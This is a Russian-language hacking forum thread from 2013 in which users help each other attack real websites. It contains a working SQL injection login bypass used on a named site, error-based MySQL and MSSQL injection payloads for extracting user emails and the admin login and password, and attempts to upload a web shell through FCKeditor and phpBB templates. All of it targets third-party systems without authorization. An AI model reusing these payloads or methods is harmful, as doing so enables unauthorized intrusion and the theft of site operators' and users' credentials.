08.03.2013, 00:09
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
Сообщение от Always
http://adjump.ru/
пост
logsecurecash=1&login_name=[SQL inj]&login_pass=111111&x=31&y=13
перепробовал различные варианты...никак.
logsecurecash=1&login_name= ' or 1#&login_pass=111111&x=31&y=13
Вы зашли как: advaweb
Баланс: 10 руб.
|
|
|
08.03.2013, 00:13
|
|
Познающий
Регистрация: 08.02.2012
Сообщений: 72
С нами:
7504886
Репутация:
0
|
|
Сообщение от cat1vo
logsecurecash=1&login_name=
' or 1#
&login_pass=111111&x=31&y=13
Вы зашли как:
advaweb
Баланс: 10 руб.
Стыдно, спасибо
|
|
|
|
09.03.2013, 04:35
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от pharm_all
Mssql
Надо вывести name lastname email
(select top 1 cast(name as nvarchar)+char(0x7a)+cast(email as nvarchar) from member where id=4)--
вывод: name:email@email.com
Как вывести еще lastname в одном запросе , если делаю
(select top 1 cast(name as nvarchar)+char(0x7a)+cast(
lastname
as nvarchar+char(0x7а)+cast(email as nvarchar) from member where id=4)--
Не выводит 3 значение :
name:lastname:email@email.com
Как вывести одним запросом 3 значения?
Потому что скобку забыл в запросе
(select top 1 cast(name as nvarchar)+char(0x7a)+cast(lastname as nvarchar )+char(0x7а)+cast(email as nvarchar) from member where id=4)--
|
|
|
|
09.03.2013, 11:11
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
С нами:
9979143
Репутация:
-5
|
|
Подскажите по поводу FCKeditor 2.5.1 Build 17566
txt файлы спокойно льются, а вот php никак нехочет пробывал:
1) Через /php/upload.php?Type=Media
2) Грузил txt указывал в Current Folder: wso.php%00
3) Пробывал %00 в url-decode, так же пробывал wso2.php%00.txt
Что посоветуете? других дыр нет есть еще CKEditor 3.2.1
Двиг: Powered by cc Engine (китайский двиг)
P.S>.htaccess так же не грузит
|
|
|
|
09.03.2013, 14:34
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
С нами:
9761387
Репутация:
2
|
|
Подскажите в чем может быть проблема
Сообственно пытаюсь лить шелл через админку phpbb 3 через стили
Включаю выполнение php кода в шаблонах, иду в шаблоны faq_body.html
впиливаю код
Иду в forum.com/faq.php?c=phpinfo(); пхпинфо не выводится = \
Подскажите почему может не выполнятся пхпкод
права в админке полные, мб можно еще какнить залить?
|
|
|
|
09.03.2013, 14:39
|
|
Новичок
Регистрация: 22.01.2013
Сообщений: 23
С нами:
7002326
Репутация:
0
|
|
Сообщение от cat1vo
Что за бред, думать надо хоть не много головой, инъекция в куках, а Вы хотите их отключить? Тут дело в другом, человек совершенно не умеет этим всем пользоваться и работать с тем, что нашел ему сканер, да и по всей видимости, сам не понимает, что хочет.
Все отлично работает, запрос переделал, мне так удобнее...
Код:
Host: game.*****.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
Cookie: login=demodemo; pass="or(1)group+by(mid((select+concat_ws(0x3a,version(),schema())),rand(0)|0))having(avg(0))or"
Duplicate entry '
5.5.29-1-log:s10parl
' for key 'group_key'
Версия -
5.5.29-1-log
Названия Базы Данных -
s10parl
"or(1)group+by(mid((
СЮДА ВСТАВЛЯЙТЕ СВОЙ ЗАПРОС
),rand(0)|0))having(avg(0))or"
Дальше делайте сами, если не знаете как, на форуме есть мануал -
ССЫЛКА
З.Ы. Для работы можете пользоваться тем же Acunetix, Burp Suite, Firefox (Live HTTP Headers) или HTTPAnalyzer (я предпочитаю его)! пытаюсь отправить запросы для вывода данных хотя бы юзеров.
то и дело выходят ошибки :
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' at line 1
Сообщение от None
Table 'panel.users' doesn't exist
Сообщение от None
Table 'panel.***' doesn't exist
Подскажите где взять список запросов?
|
|
|
|
09.03.2013, 15:13
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от panfilov1991
пытаюсь отправить запросы для вывода данных хотя бы юзеров.
то и дело выходят ошибки :
Подскажите где взять список запросов?
а какой запрос вы делайте? покажите.
|
|
|
|
09.03.2013, 15:29
|
|
Новичок
Регистрация: 22.01.2013
Сообщений: 23
С нами:
7002326
Репутация:
0
|
|
Сообщение от winstrool
а какой запрос вы делайте? покажите.
Сообщение от None
"or(1)group+by(mid((SELECT * FROM users WHERE login='Admin' AND pass='123' OR login='Admin' --''),rand(0)|0))having(avg(0))or"
ошибка :
Сообщение от None
Table 'panel.users' doesn't exist
Как можно вывести названия таблиц?
Очень надо вывести логин и пасс админа
|
|
|
|
09.03.2013, 15:44
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от panfilov1991
ошибка :
Как можно вывести названия таблиц?
Очень надо вывести логин и пасс админа
Сообщение от None
"or(1)group+by(mid((SELECT concat_ws(0x3a,login,pass) FROM users WHERE login=0x41646D696E limit 0,1),rand(0)|0))having(avg(0))or"
там где значение 0x41646D696E это Admin, вам бы мануалы по mysql почитать!
|
|
|
|
09.03.2013, 16:05
|
|
Новичок
Регистрация: 22.01.2013
Сообщений: 23
С нами:
7002326
Репутация:
0
|
|
Сообщение от winstrool
там где значение 0x41646D696E это Admin, вам бы мануалы по mysql почитать!
Мне реально стыдно! я уже их перечитался!
мне бы пароль админа содрать, или таблицы вывести с БД
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
